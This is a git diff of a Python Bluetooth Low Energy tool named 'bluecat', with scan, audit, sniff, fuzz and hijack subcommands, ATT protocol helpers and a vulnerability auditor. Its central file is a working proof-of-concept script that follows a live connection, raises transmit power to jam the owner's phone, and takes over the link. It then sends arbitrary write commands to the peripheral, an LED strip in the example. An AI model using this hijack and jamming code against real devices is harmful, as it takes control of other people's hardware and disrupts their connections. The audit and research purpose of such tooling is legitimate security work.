+        description="Passively sniff an existing BLE connection to MAC. "
+                    "Prints every ATT read, write, notification, and indication "
+                    "in real time — handle + value.  No connection is initiated; "
+                    "purely passive.  Useful as a recon step before hijacking "
+                    "to identify the control-point handle and command bytes.",
+    )
+    _add_common(sp_sniff)
+    sp_sniff.add_argument("mac", metavar="MAC",
+                          help="Target peripheral MAC address (e.g. AA:BB:CC:DD:EE:FF)")
+    sp_sniff.add_argument("-c", "--advchan", type=int, default=37, choices=[37, 38, 39],
+                          metavar="{37,38,39}",
+                          help="Primary advertising channel to listen on (default: 37)")
+    sp_sniff.add_argument("--time", type=float, default=None, metavar="SECONDS",
+                          help="Stop after SECONDS (default: run until Ctrl-C)")
+    sp_sniff.add_argument("-o", "--output", default=None, metavar="FILE.pcap",
+                          help="PCAP output file for captured traffic")
+
+    args = top.parse_args()
+
+    dispatch = {
+        "scan":    cmd_scan,
+        "audit":   cmd_audit,
+        "connect": cmd_connect,
+        "hijack":  cmd_hijack,
+        "fuzz":    cmd_fuzz,
+        "sniff":   cmd_sniff,
+    }
+    dispatch[args.command](args)
+
+
+if __name__ == "__main__":
+    # Guaranteed clean exit: a failed connection or a lingering background thread
+    # must never leave this process alive holding the serial port. os._exit
+    # terminates immediately (the OS reclaims the serial fd) once the command is
+    # done, after preserving the exit code and printing any real traceback.
+    _code = 0
+    try:
+        main()
+    except SystemExit as _e:
+        _code = _e.code if isinstance(_e.code, int) else (1 if _e.code else 0)
+    except KeyboardInterrupt:
+        _code = 130
+    except Exception:
+        traceback.print_exc()
+        _code = 1
+    sys.stdout.flush()
+    sys.stderr.flush()
+    os._exit(_code)

--- a/python_cli/bluecat.py
+++ b/python_cli/bluecat.py
@@ -232,8 +232,12 @@ def cmd_audit(args):
         addr_type = "Public" if getattr(args, "public", False) else "Random"
         device = Device(mac=args.mac, addr_type=addr_type)
         print("[*] auditing %s (%s) ..." % (args.mac, addr_type), file=sys.stderr)
+        # Single-target audit: be as persistent as `connect`. A slow/flaky
+        # peripheral often needs several tries, and the address type here is only
+        # a guess from --public, so let the last attempt flip it.
         findings = aud.audit_device(hw, device,
-                                    aggressive=getattr(args, "aggressive", False))
+                                    aggressive=getattr(args, "aggressive", False),
+                                    attempts=4, try_both_addr_types=True)
         block = aud.render_audit(device, findings, color=use_color)
         output_text = block + "\n"
         results = [(device, findings)]

--- a/python_cli/bluecat.py
+++ b/python_cli/bluecat.py
@@ -1,16 +1,16 @@
 #!/usr/bin/env python3
 
-# bluecat — BLE recon/hijack/GATT tool
+# bluecat - BLE recon/hijack/GATT tool
 # Uses Sniffle hardware (CatSniffer) to scan, audit, connect to, hijack, or
 # fuzz a BLE peripheral, enumerate GATT services, and drop into an interactive
 # REPL.
 #
 # Subcommands:
-#   bluecat scan              — passive/active BLE scan
-#   bluecat audit  [MAC]      — vulnerability assessment
-#   bluecat connect MAC       — connect as central → GATT enum → REPL
-#   bluecat hijack [MAC]      — take over a live connection → enum → REPL
-#   bluecat fuzz   [MAC]      — multi-layer BLE fuzzer
+#   bluecat scan              - passive/active BLE scan
+#   bluecat audit  [MAC]      - vulnerability assessment
+#   bluecat connect MAC       - connect as central -> GATT enum -> REPL
+#   bluecat hijack [MAC]      - take over a live connection -> enum -> REPL
+#   bluecat fuzz   [MAC]      - multi-layer BLE fuzzer
 
 import argparse, sys, signal, json, binascii, logging, os, traceback
 from time import sleep
@@ -42,7 +42,7 @@ def _hexbytes(tokens):
 
 def _quiet_logger():
     """Logger at ERROR level so SniffleHW's per-packet 'Skipping decode due to
-    exception' warnings (benign — a stray/short packet that fails the adv
+    exception' warnings (benign - a stray/short packet that fails the adv
     decoder) don't flood stderr with tracebacks. Real errors still show."""
     lg = logging.getLogger("bluecat.hw")
     lg.setLevel(logging.ERROR)
@@ -119,7 +119,7 @@ def repl(link, name, mac, posture):
         import readline  # noqa: F401
     except ImportError:
         pass
-    print("\nbluecat REPL — 'help' for commands.\n")
+    print("\nbluecat REPL - 'help' for commands.\n")
     while link.alive:
         while not link.notifications.empty():
             h, v = link.notifications.get()
@@ -164,7 +164,7 @@ def repl(link, name, mac, posture):
                 print("  sending LL_TERMINATE_IND (reason 0x%02X); closing link..." % reason)
                 clean = link.terminate(reason)   # blocks until firmware -> STATIC, or forces a reset
                 print("  link closed by peer ack." if clean
-                      else "  peer didn't ack in time — forced firmware reset.")
+                      else "  peer didn't ack in time - forced firmware reset.")
                 print("  peer should re-advertise; reconnect:  bluecat connect %s" % mac)
                 # link.alive is now False, so the REPL loop exits cleanly below.
             elif op == "posture":
@@ -256,7 +256,7 @@ def cmd_audit(args):
         blocks = []
 
         def _on_discover(d):
-            print("[~] %s (%s) %s — auditing..." %
+            print("[~] %s (%s) %s - auditing..." %
                   (d.mac, d.addr_type, d.name or ""), file=sys.stderr)
 
         def _on_result(d, f):
@@ -321,7 +321,7 @@ def cmd_audit(args):
 def _connect_or_die(hw, mac_str, public, posture, timeout=8):
     """Connect to mac_str, trying BOTH address types so --public isn't required
     (the scan already knows public vs random, but a direct MAC might not). Returns
-    a live CentralLink, or prints a clean message and exits — never a traceback."""
+    a live CentralLink, or prints a clean message and exits - never a traceback."""
     macl = parse_mac(mac_str)
     for is_random in (not public, public):   # the user's hint first, then the other
         try:
@@ -333,7 +333,7 @@ def _connect_or_die(hw, mac_str, public, posture, timeout=8):
                 sleep(0.3)
             except Exception:
                 pass
-    print("[!] Could not connect to %s — tried both public and random address types."
+    print("[!] Could not connect to %s - tried both public and random address types."
           % mac_str, file=sys.stderr)
     print("[!] Is it advertising and not already connected to a phone/app?",
           file=sys.stderr)
@@ -357,7 +357,7 @@ def _access(hw, args, mode):
             link = ses.hijack_session(hw, parse_mac(args.mac), advchan=advchan,
                                       posture=posture)
             name, mac = "?", args.mac
-        else:  # connect — _connect_or_die handles its own clean exit on failure
+        else:  # connect - _connect_or_die handles its own clean exit on failure
             print("[*] connecting to %s ..." % args.mac, file=sys.stderr)
             link = _connect_or_die(hw, args.mac, args.public, posture)
             posture.saw_plaintext_att = True
@@ -373,10 +373,10 @@ def _access(hw, args, mode):
     # Wire up pcap BEFORE do_enum so all GATT traffic is captured.
     link.pcap_writer = pcap
 
-    print("[+] in CENTRAL — posture:", posture.verdict())
+    print("[+] in CENTRAL - posture:", posture.verdict())
 
     # Controller identity: LL_VERSION_IND carries the Bluetooth SIG Company
-    # Identifier of the peer's BLE controller (silicon/stack vendor — not always
+    # Identifier of the peer's BLE controller (silicon/stack vendor - not always
     # the product brand). This is the SIG company id even when the device
     # advertises no Manufacturer Specific Data.
     try:
@@ -390,7 +390,7 @@ def _access(hw, args, mode):
         try:
             do_enum(link, name, mac, posture)
         except TimeoutError:
-            print("[!] reached CENTRAL but peer is not responding to ATT — "
+            print("[!] reached CENTRAL but peer is not responding to ATT - "
                   "is the target still connected to another device, or not actually connectable?")
         except (ATTError, LinkLost) as e:
             print("[!] enum incomplete:", e)
@@ -471,7 +471,7 @@ def cmd_fuzz(args):
         reconnect_fn = None
         print("[!] note: crash-resume unavailable in follow mode", file=sys.stderr)
 
-    print("[+] in CENTRAL — posture:", posture.verdict(), file=sys.stderr)
+    print("[+] in CENTRAL - posture:", posture.verdict(), file=sys.stderr)
 
     gcli = gatt.GattClient(link)
 
@@ -558,7 +558,7 @@ def _add_common(p):
 def main():
     top = argparse.ArgumentParser(
         prog="bluecat",
-        description="bluecat — BLE recon/hijack/GATT tool (CatSniffer)",
+        description="bluecat - BLE recon/hijack/GATT tool (CatSniffer)",
         epilog="Run 'bluecat <command> -h' for per-command help.",
     )
 
@@ -569,7 +569,7 @@ def main():
     sp_scan = subs.add_parser(
         "scan",
         help="Discover nearby BLE devices (passive scan)",
-        description="Passive BLE scan — lists all advertising devices seen on the "
+        description="Passive BLE scan - lists all advertising devices seen on the "
                     "selected channel(s) during the dwell window.",
     )
     _add_common(sp_scan)
@@ -609,7 +609,7 @@ def main():
                           help="Enable aggressive checks (reserved; accepted but unused in "
                                "this release)")
     sp_audit.add_argument("--skip-private", action="store_true",
-                          help="Skip RPA/NRPA (private/rotating) addresses — "
+                          help="Skip RPA/NRPA (private/rotating) addresses - "
                                "only Public and Static addresses are audited")
     sp_audit.add_argument("--no-color", action="store_true",
                           help="Disable ANSI color in output")
@@ -621,7 +621,7 @@ def main():
     # --------------------------------------------------------------- connect
     sp_connect = subs.add_parser(
         "connect",
-        help="Connect as central → GATT enumeration → interactive REPL",
+        help="Connect as central -> GATT enumeration -> interactive REPL",
         description="Initiate an outbound BLE connection to MAC, enumerate GATT "
                     "services, and drop into an interactive REPL.",
     )
@@ -638,7 +638,7 @@ def main():
     # --------------------------------------------------------------- hijack
     sp_hijack = subs.add_parser(
         "hijack",
-        help="Take over a live connection → GATT enum → REPL; no MAC = follow first seen",
+        help="Take over a live connection -> GATT enum -> REPL; no MAC = follow first seen",
         description="Sniff then hijack an existing BLE connection.  With a MAC, "
                     "waits for and hijacks a connection to that specific peripheral. "
                     "Without a MAC, follows (takes over) the first connection seen "
@@ -700,7 +700,7 @@ def main():
         help="Passively follow a live BLE connection and print ATT operations",
         description="Passively sniff an existing BLE connection to MAC. "
                     "Prints every ATT read, write, notification, and indication "
-                    "in real time — handle + value.  No connection is initiated; "
+                    "in real time - handle + value.  No connection is initiated; "
                     "purely passive.  Useful as a recon step before hijacking "
                     "to identify the control-point handle and command bytes.",
     )

--- a/python_cli/conftest.py
+++ b/python_cli/conftest.py
@@ -1,0 +1,44 @@
+import queue
+from sniffle import att
+from sniffle.packet_decoder import PacketMessage
+
+
+class FakeHW:
+    def __init__(self):
+        self._rx = queue.Queue()
+        self.sent = []
+        self.reset_count = 0
+
+    def feed(self, msg):
+        self._rx.put(msg)
+
+    def recv_and_decode(self, desync=False):
+        return self._rx.get()
+
+    def cmd_transmit(self, llid, pdu, event=0):
+        self.sent.append((llid, bytes(pdu)))
+
+    def cmd_reset(self):
+        self.reset_count += 1
+
+
+def make_att_packet(att_pdu, p_to_c=True):
+    """Build a PacketMessage that DPacketMessage.decode() will classify as a
+    peripheral->central LlDataMessage carrying the given ATT PDU.
+
+    LL data PDU body layout:
+      byte 0: LLID (bits 1:0) | NESN (bit 2) | SN (bit 3) | MD (bit 4) | RFU
+              LLID=2 => L2CAP start/complete PDU
+      byte 1: data_length (payload length)
+      bytes 2..: L2CAP header (len 2B, cid 2B) + ATT PDU
+
+    PacketMessage.from_body(body, is_data=True, peripheral_send=True):
+      - is_data=True  => SniffleDecoderState(is_data=True) => cur_aa=0 (not BLE_ADV_AA)
+                         so DPacketMessage.decode routes to DataMessage.decode
+      - peripheral_send=True => length MSB set => data_dir=1 (P->C)
+    """
+    l2cap = att.l2cap_wrap(att_pdu)        # 4-byte L2CAP header + ATT
+    # LL header: LLID=2, everything else 0
+    ll_hdr = bytes([0x02, len(l2cap)])
+    body = ll_hdr + l2cap
+    return PacketMessage.from_body(body, is_data=True, peripheral_send=p_to_c)

--- a/python_cli/hijack_poc.py
+++ b/python_cli/hijack_poc.py
@@ -1,11 +1,11 @@
 #!/usr/bin/env python3
 
-# Hijack test script for COMMAND_HIJACK (0x28)
-# Tests connection takeover against an unencrypted BLE peripheral (e.g. LED strip)
+# Hijack proof-of-concept (PoC) script for COMMAND_HIJACK (0x28)
+# Demonstrates connection takeover against an unencrypted BLE peripheral (e.g. LED strip)
 #
 # Usage:
-#   python3 hijack_test.py -m AA:BB:CC:DD:EE:FF
-#   python3 hijack_test.py -m AA:BB:CC:DD:EE:FF -s /dev/ttyACM0 --handle 0x0003
+#   python3 hijack_poc.py -m AA:BB:CC:DD:EE:FF
+#   python3 hijack_poc.py -m AA:BB:CC:DD:EE:FF -s /dev/ttyACM0 --handle 0x0003
 
 import argparse, sys, signal, threading
 from time import time, sleep

--- a/python_cli/hijack_poc.py
+++ b/python_cli/hijack_poc.py
@@ -52,7 +52,7 @@ def wait_for_stable_timing(n_events=20, timeout=30):
 
     WinOffsetMeasurement is only generated for encrypted connections so it
     never arrives for this unencrypted strip. Instead we count received
-    packets — once the firmware has seen N events its nextHopTime is stable
+    packets - once the firmware has seen N events its nextHopTime is stable
     and the hijack will fire at the right moment.
     """
     count = 0
@@ -177,7 +177,7 @@ def interactive_loop(handle):
                 print("Invalid color format. Use 'color RRGGBB' (e.g. color FF0000)")
                 continue
         else:
-            # raw hex passthrough — send exactly what was typed
+            # raw hex passthrough - send exactly what was typed
             try:
                 payload = bytes.fromhex(cmd.replace(' ', ''))
                 if len(payload) == 0:
@@ -282,11 +282,11 @@ def main():
                 break
 
     if link_alive:
-        print("[+] Link confirmed alive — peripheral is responding.")
+        print("[+] Link confirmed alive - peripheral is responding.")
     else:
         print("[!] No response from peripheral in 2s.")
         print("[!] Connection may have timed out during hijack.")
-        print("[!] Reconnect phone to LED and run again — WinOffset needs to sync first.")
+        print("[!] Reconnect phone to LED and run again - WinOffset needs to sync first.")
 
     # --- Phase 4: interactive control ---
     interactive_loop(args.handle)

--- a/python_cli/hijack_test.py
+++ b/python_cli/hijack_test.py
@@ -1,0 +1,297 @@
+#!/usr/bin/env python3
+
+# Hijack test script for COMMAND_HIJACK (0x28)
+# Tests connection takeover against an unencrypted BLE peripheral (e.g. LED strip)
+#
+# Usage:
+#   python3 hijack_test.py -m AA:BB:CC:DD:EE:FF
+#   python3 hijack_test.py -m AA:BB:CC:DD:EE:FF -s /dev/ttyACM0 --handle 0x0003
+
+import argparse, sys, signal, threading
+from time import time, sleep
+
+from sniffle.sniffle_hw import SniffleHW, SnifferMode, DebugMessage
+from sniffle.sniffer_state import StateMessage, SnifferState
+from sniffle.measurements import MeasurementMessage
+from sniffle.packet_decoder import PacketMessage, DPacketMessage, DataMessage, \
+        LlDataContMessage
+
+hw = None
+_stop_recv = threading.Event()
+
+def sigint_handler(sig, frame):
+    print("\nInterrupted.")
+    _stop_recv.set()
+    if hw:
+        hw.cancel_recv()
+    sys.exit(0)
+
+def parse_mac(mac_str):
+    try:
+        parts = [int(h, 16) for h in reversed(mac_str.split(":"))]
+        if len(parts) != 6:
+            raise ValueError
+        return parts
+    except Exception:
+        print("ERROR: MAC must be 6 colon-separated hex bytes (e.g. AA:BB:CC:DD:EE:FF)",
+              file=sys.stderr)
+        sys.exit(1)
+
+def wait_for_state(target_state, timeout=30):
+    """Block until a StateMessage with target_state is received or timeout."""
+    deadline = time() + timeout
+    while time() < deadline:
+        msg = hw.recv_and_decode()
+        print_msg(msg)
+        if isinstance(msg, StateMessage) and msg.new_state == target_state:
+            return True
+    return False
+
+def wait_for_stable_timing(n_events=20, timeout=30):
+    """Wait until we have tracked N consecutive connection events in DATA state.
+
+    WinOffsetMeasurement is only generated for encrypted connections so it
+    never arrives for this unencrypted strip. Instead we count received
+    packets — once the firmware has seen N events its nextHopTime is stable
+    and the hijack will fire at the right moment.
+    """
+    count = 0
+    deadline = time() + timeout
+    while time() < deadline:
+        msg = hw.recv_and_decode()
+        if isinstance(msg, PacketMessage):
+            dpkt = DPacketMessage.decode(msg)
+            # count every C->P packet (each one is a new connection event)
+            if hasattr(dpkt, 'data_dir') and dpkt.data_dir == 0:
+                count += 1
+                if count % 5 == 0:
+                    print("[*] Tracked %d/%d connection events..." % (count, n_events))
+                if count >= n_events:
+                    print("[+] Timing stable after %d events." % count)
+                    return True
+            print_msg(msg)
+        elif isinstance(msg, StateMessage):
+            print_msg(msg)
+            if msg.new_state not in (SnifferState.DATA,):
+                print("[!] Unexpected state: %s" % msg.new_state.name)
+                return False
+        else:
+            print_msg(msg)
+    print("[!] Timed out waiting for %d events (got %d)." % (n_events, count))
+    return False
+
+def print_msg(msg):
+    if isinstance(msg, PacketMessage):
+        dpkt = DPacketMessage.decode(msg)
+        # skip empty data continuations unless you want verbose output
+        if isinstance(dpkt, LlDataContMessage) and dpkt.data_length == 0:
+            return
+        print(dpkt, end='\n\n')
+    elif isinstance(msg, (StateMessage, MeasurementMessage, DebugMessage)):
+        print(msg, end='\n\n')
+
+# Color commands extracted from LED_connection.pcapng (ELK-BLEDOM strip).
+# The real app uses ATT Write Command (0x52) to handle 0x000e (vendor 0xfff0
+# service), sending 9-byte frames "7e 07 05 03 RR GG BB 10 ef". Handle 0x0003
+# was the GAP Device Name, and the 7b..bf framing is a different LED protocol --
+# writing those did nothing on this device.
+LED_PRESETS = {
+    '1': bytes.fromhex('7e070503ff000010ef'), # Red
+    '2': bytes.fromhex('7e07050300ff0010ef'), # Green
+    '3': bytes.fromhex('7e0705030000ff10ef'), # Blue
+    '4': bytes.fromhex('7e070503ffffff10ef'), # White
+    'pcap': bytes.fromhex('7e070503006fff10ef'), # verbatim known-good frame from pcap
+    'off': bytes.fromhex('7e07050300000010ef'), # RGB=0 (visually off)
+}
+
+def build_att_write(handle, value_bytes):
+    """Build an ATT Write Command (opcode 0x52, no response)."""
+    pdu = bytes([0x52, handle & 0xFF, handle >> 8]) + bytes(value_bytes)
+    l2cap = len(pdu).to_bytes(2, 'little') + b'\x04\x00' + pdu
+    return l2cap
+
+def _recv_background():
+    """Background thread: drain serial port and print all incoming messages.
+
+    Running this thread prevents the serial RX buffer from filling up while
+    input() blocks the main thread, and prints incoming PDUs in real time.
+    """
+    while not _stop_recv.is_set():
+        try:
+            msg = hw.recv_and_decode()
+            if msg is not None:
+                print_msg(msg)
+        except Exception:
+            pass
+
+def interactive_loop(handle):
+    """Send ATT writes; background thread drains serial while input() blocks."""
+    # Start background receiver BEFORE anything else so the serial port is
+    # continuously drained even when input() is blocking the main thread.
+    recv_t = threading.Thread(target=_recv_background, daemon=True)
+    recv_t.start()
+
+    print()
+    print("Hijack successful! You now control the peripheral.")
+    print()
+
+    # --- Immediately auto-cycle all 3 presets ---
+    # This proves the hijack worked without requiring the user to type anything.
+    # Sends 4 writes in ~1 second, well within the 720 ms supervision window
+    # between writes (each write resets the peripheral's supervision timer).
+    print("[*] Auto-cycling presets to demonstrate control...")
+    for k in ('1', '2', '3', '1'):
+        pdu = build_att_write(handle, LED_PRESETS[k])
+        hw.cmd_transmit(2, pdu)
+        print("  [auto %s] -> %s" % (k, LED_PRESETS[k].hex()))
+        sleep(0.25)
+
+    print()
+    print("Presets (exact bytes from your pcap):")
+    for k, v in LED_PRESETS.items():
+        print("  %s  ->  %s" % (k, v.hex()))
+    print()
+    print("Or use 'color RRGGBB' (e.g., 'color FF00FF' for magenta)")
+    print("Or paste any raw hex to send as-is (e.g. 7bff07ff000000ffbf)")
+    print("Type 'quit' to exit.")
+    print()
+
+    while True:
+        try:
+            cmd = input("> ").strip().lower()
+        except EOFError:
+            break
+
+        if cmd in ('quit', 'q'):
+            break
+        elif cmd in LED_PRESETS:
+            payload = LED_PRESETS[cmd]
+        elif cmd.startswith('color '):
+            # ELK-BLEDOM RGB set: 7e 07 05 03 RR GG BB 10 ef (see LED_connection.pcapng)
+            try:
+                hex_color = cmd.split(' ')[1].strip()
+                if len(hex_color) != 6:
+                    raise ValueError
+                payload = bytes.fromhex('7e070503' + hex_color + '10ef')
+            except Exception:
+                print("Invalid color format. Use 'color RRGGBB' (e.g. color FF0000)")
+                continue
+        else:
+            # raw hex passthrough — send exactly what was typed
+            try:
+                payload = bytes.fromhex(cmd.replace(' ', ''))
+                if len(payload) == 0:
+                    continue
+            except ValueError:
+                print("Enter a preset key, 'color RRGGBB', or raw hex bytes.")
+                continue
+
+        pdu = build_att_write(handle, payload)
+        hw.cmd_transmit(2, pdu)
+        print("  -> %s" % payload.hex())
+
+    _stop_recv.set()
+
+def main():
+    aparse = argparse.ArgumentParser(
+            description="Test COMMAND_HIJACK: sniff a BLE connection then take it over")
+    aparse.add_argument("-s", "--serport", default=None,
+            help="CatSniffer serial port (auto-detected if omitted)")
+    aparse.add_argument("-m", "--mac", required=True,
+            help="Target peripheral MAC address (e.g. AA:BB:CC:DD:EE:FF)")
+    aparse.add_argument("-P", "--public", action="store_true",
+            help="MAC is a public address (default: random)")
+    aparse.add_argument("--handle", default="0x000e", type=lambda x: int(x, 0),
+            help="ATT handle of the LED control characteristic (default: 0x000e)")
+    aparse.add_argument("--no-instahop", action="store_true",
+            help="Skip waiting for WinOffset sync (hijack fires as soon as DATA state reached)")
+    aparse.add_argument("-b", "--baudrate", type=int, default=921600,
+            help="Serial port baud rate (default: 921600)")
+    args = aparse.parse_args()
+
+    mac = parse_mac(args.mac)
+
+    global hw
+    hw = SniffleHW(args.serport, baudrate=args.baudrate)
+    signal.signal(signal.SIGINT, sigint_handler)
+
+    # --- Phase 1: sniff for the connection ---
+    print("[*] Configuring sniffer...")
+    print("[*] Target MAC: %s" % args.mac)
+
+    hw.setup_sniffer(
+        mode=SnifferMode.CONN_FOLLOW,
+        targ_mac=mac,
+        hop3=True,
+        rssi_min=-128,
+    )
+    hw.cmd_instahop(True)
+    hw.mark_and_flush()
+
+    print("[*] Waiting for connection to target (connect phone to LED strip now)...")
+    if not wait_for_state(SnifferState.DATA, timeout=60):
+        print("ERROR: timed out waiting for DATA state.", file=sys.stderr)
+        sys.exit(1)
+
+    print("[+] Following connection (DATA state).")
+
+    # --- Phase 2: wait for timing to stabilize ---
+    if not args.no_instahop:
+        print("[*] Tracking connection events to stabilize timing...")
+        print("[*] Keep the phone connected (idle is fine, no need to change colors).")
+        wait_for_stable_timing(n_events=20, timeout=30)
+    else:
+        print("[!] Skipping timing stabilization (--no-instahop set).")
+
+    # --- Phase 3: hijack ---
+    # Crank up TX power to overpower the cellphone and force Packet Collisions
+    # (Capture Effect: receiver decodes the strongest signal)
+    print("[*] Boosting TX power to +5 dBm to jam the phone...")
+    hw.cmd_tx_power(5)
+
+    print("[*] Firing cmd_hijack_live()...")
+    hw.cmd_hijack_live()
+
+    print("[*] Waiting for CENTRAL state confirmation...")
+    if not wait_for_state(SnifferState.CENTRAL, timeout=10):
+        print("ERROR: did not reach CENTRAL state.", file=sys.stderr)
+        print("  Possible causes:")
+        print("  - Firmware not flashed with COMMAND_HIJACK support")
+        print("  - Connection dropped before hijack fired")
+        print("  - WinOffset not synced (try without --no-instahop)")
+        sys.exit(1)
+
+    print("[+] CENTRAL state confirmed. Phone should have lost connection.")
+
+    # --- Phase 3.5: verify connection is alive ---
+    print("[*] Verifying link is alive (waiting for peripheral response)...")
+    hw.cmd_transmit(2, build_att_write(args.handle, LED_PRESETS['1']))
+    link_alive = False
+    deadline = time() + 2.0
+    while time() < deadline:
+        msg = hw.recv_and_decode()
+        print_msg(msg)  # print everything, incl. firmware HJ DebugMessages
+        if isinstance(msg, PacketMessage):
+            dpkt = DPacketMessage.decode(msg)
+            # any packet from peripheral (P->C direction) confirms the link is up
+            if hasattr(dpkt, 'data_dir') and dpkt.data_dir == 1:
+                link_alive = True
+                break
+            elif isinstance(dpkt, LlDataContMessage):
+                link_alive = True
+                break
+
+    if link_alive:
+        print("[+] Link confirmed alive — peripheral is responding.")
+    else:
+        print("[!] No response from peripheral in 2s.")
+        print("[!] Connection may have timed out during hijack.")
+        print("[!] Reconnect phone to LED and run again — WinOffset needs to sync first.")
+
+    # --- Phase 4: interactive control ---
+    interactive_loop(args.handle)
+
+    print("[*] Done.")
+
+if __name__ == "__main__":
+    main()

--- a/python_cli/sniffle/att.py
+++ b/python_cli/sniffle/att.py
@@ -1,0 +1,110 @@
+import struct
+
+ATT_ERROR_RSP         = 0x01
+ATT_EXCHANGE_MTU_REQ  = 0x02
+ATT_FIND_INFO_REQ     = 0x04
+ATT_FIND_INFO_RSP     = 0x05
+ATT_READ_BY_TYPE_REQ  = 0x08
+ATT_READ_BY_TYPE_RSP  = 0x09
+ATT_READ_REQ          = 0x0A
+ATT_READ_RSP          = 0x0B
+ATT_READ_BLOB_REQ     = 0x0C
+ATT_READ_BLOB_RSP     = 0x0D
+ATT_READ_BY_GROUP_REQ = 0x10
+ATT_READ_BY_GROUP_RSP = 0x11
+ATT_WRITE_REQ         = 0x12
+ATT_WRITE_RSP         = 0x13
+ATT_WRITE_CMD         = 0x52
+ATT_HANDLE_VALUE_NTF  = 0x1B
+ATT_HANDLE_VALUE_IND  = 0x1D
+ATT_HANDLE_VALUE_CFM  = 0x1E
+
+ATT_CID = 0x0004
+SMP_CID = 0x0006
+
+GATT_PRIMARY_SERVICE = 0x2800
+GATT_CHARACTERISTIC  = 0x2803
+GATT_CCCD            = 0x2902
+
+ATT_ERRORS = {
+    0x01: "Invalid Handle", 0x02: "Read Not Permitted", 0x03: "Write Not Permitted",
+    0x04: "Invalid PDU", 0x05: "Insufficient Authentication", 0x06: "Request Not Supported",
+    0x07: "Invalid Offset", 0x08: "Insufficient Authorization", 0x09: "Prepare Queue Full",
+    0x0A: "Attribute Not Found", 0x0B: "Attribute Not Long",
+    0x0C: "Insufficient Enc Key Size", 0x0D: "Invalid Attribute Value Length",
+    0x0E: "Unlikely Error", 0x0F: "Insufficient Encryption",
+    0x10: "Unsupported Group Type", 0x11: "Insufficient Resources",
+}
+
+def att_error_name(code):
+    return ATT_ERRORS.get(code, "Error 0x%02X" % code)
+
+def l2cap_wrap(pdu, cid=ATT_CID):
+    return struct.pack('<HH', len(pdu), cid) + pdu
+
+def parse_uuid(b):
+    if len(b) == 2:
+        return struct.unpack('<H', b)[0]
+    return b[::-1].hex()
+
+def build_read_by_group_req(start, end, group=GATT_PRIMARY_SERVICE):
+    return struct.pack('<BHHH', ATT_READ_BY_GROUP_REQ, start, end, group)
+
+def build_read_by_type_req(start, end, type_uuid=GATT_CHARACTERISTIC):
+    return struct.pack('<BHHH', ATT_READ_BY_TYPE_REQ, start, end, type_uuid)
+
+def build_find_info_req(start, end):
+    return struct.pack('<BHH', ATT_FIND_INFO_REQ, start, end)
+
+def build_read_req(handle):
+    return struct.pack('<BH', ATT_READ_REQ, handle)
+
+def build_write_req(handle, value):
+    return struct.pack('<BH', ATT_WRITE_REQ, handle) + bytes(value)
+
+def build_write_cmd(handle, value):
+    return struct.pack('<BH', ATT_WRITE_CMD, handle) + bytes(value)
+
+def parse_error_rsp(pdu):
+    _, req, handle, err = struct.unpack('<BBHB', pdu[:5])
+    return req, handle, err
+
+def parse_read_by_group_rsp(pdu):
+    each = pdu[1]; off = 2; out = []
+    while off + each <= len(pdu):
+        start, end = struct.unpack('<HH', pdu[off:off+4])
+        out.append((start, end, parse_uuid(pdu[off+4:off+each])))
+        off += each
+    return out
+
+def parse_read_by_type_rsp(pdu):
+    each = pdu[1]; off = 2; out = []
+    while off + each <= len(pdu):
+        decl = struct.unpack('<H', pdu[off:off+2])[0]
+        props = pdu[off+2]
+        vhandle = struct.unpack('<H', pdu[off+3:off+5])[0]
+        out.append((decl, props, vhandle, parse_uuid(pdu[off+5:off+each])))
+        off += each
+    return out
+
+def parse_find_info_rsp(pdu):
+    fmt = pdu[1]; ulen = 2 if fmt == 1 else 16; off = 2; out = []
+    while off + 2 + ulen <= len(pdu):
+        handle = struct.unpack('<H', pdu[off:off+2])[0]
+        out.append((handle, parse_uuid(pdu[off+2:off+2+ulen])))
+        off += 2 + ulen
+    return out
+
+def extract_att(body):
+    """body = raw LL data PDU bytes (header, len, payload). Return the ATT PDU
+    if this fragment carries a complete L2CAP ATT PDU on CID 0x0004, else None."""
+    if len(body) < 6:
+        return None
+    payload = body[2:]
+    if len(payload) < 5:
+        return None
+    l2len, cid = struct.unpack('<HH', payload[:4])
+    if cid != ATT_CID:
+        return None
+    att_pdu = payload[4:4+l2len]
+    return att_pdu if att_pdu else None

--- a/python_cli/sniffle/audit.py
+++ b/python_cli/sniffle/audit.py
@@ -1,0 +1,503 @@
+"""
+audit.py — BLE vulnerability auditor framework (pass 1 of 2).
+
+Checks implemented (non-destructive, hardware-free testable):
+  A  check_open_control   — GATT readable/writable with no auth/encryption
+  C  check_trackability   — persistent address (Public / Static RPA)
+  D  check_sensitive_chars — firmware-update / OTA characteristics exposed
+
+Checks B (pairing downgrade) and E (crash/DoS) are pass 2 — extension
+points are marked with # PASS2 comments below.
+"""
+
+from __future__ import annotations
+
+import signal
+import threading
+import time
+from dataclasses import dataclass
+
+from .central_link import ATTError, LinkLost
+from . import att as _att
+from .gatt import GattClient
+from .posture import Posture
+from .recon import Device, mac_to_list
+from .session import connect_session
+
+# ---------------------------------------------------------------------------
+# Severity constants and Finding dataclass
+# ---------------------------------------------------------------------------
+
+HIGH, MEDIUM, LOW, INFO = "HIGH", "MEDIUM", "LOW", "INFO"
+_SEV_ORDER = {HIGH: 0, MEDIUM: 1, LOW: 2, INFO: 3}
+
+
+@dataclass
+class Finding:
+    severity: str   # HIGH / MEDIUM / LOW / INFO
+    check: str      # short id, e.g. "open-control"
+    title: str      # one-line summary
+    detail: str = ""  # optional extra info
+
+
+# ---------------------------------------------------------------------------
+# DFU / OTA watch-list
+# ---------------------------------------------------------------------------
+
+# 16-bit UUIDs that unambiguously indicate a firmware-update service/char.
+# parse_uuid() returns an int for 2-byte UUIDs (see att.py:parse_uuid).
+DFU_UUIDS: dict[object, str] = {
+    0xFE59: "Nordic Secure DFU",
+}
+
+# Case-insensitive name fragments that hint at DFU/OTA capability
+DFU_NAME_HINTS = ("dfu", "ota", "firmware", "upgrade")
+
+
+# ---------------------------------------------------------------------------
+# Check C — address trackability
+# ---------------------------------------------------------------------------
+
+def check_trackability(device: Device) -> list[Finding]:
+    """Return a LOW finding if the device uses a persistent (trackable) address.
+
+    Public and Static Random addresses never rotate → long-term tracking is
+    possible.  RPA (Resolvable Private) and NRPA (Non-resolvable Private)
+    rotate and are therefore not flagged.
+    """
+    addr_type = device.addr_type
+    if addr_type in ("Public", "Static"):
+        return [Finding(
+            severity=LOW,
+            check="trackable",
+            title="Persistently trackable address (%s)" % addr_type,
+            detail="No RPA rotation — the device can be tracked across time/locations.",
+        )]
+    return []
+
+
+# ---------------------------------------------------------------------------
+# Check A — open GATT control (no auth / encryption)
+# ---------------------------------------------------------------------------
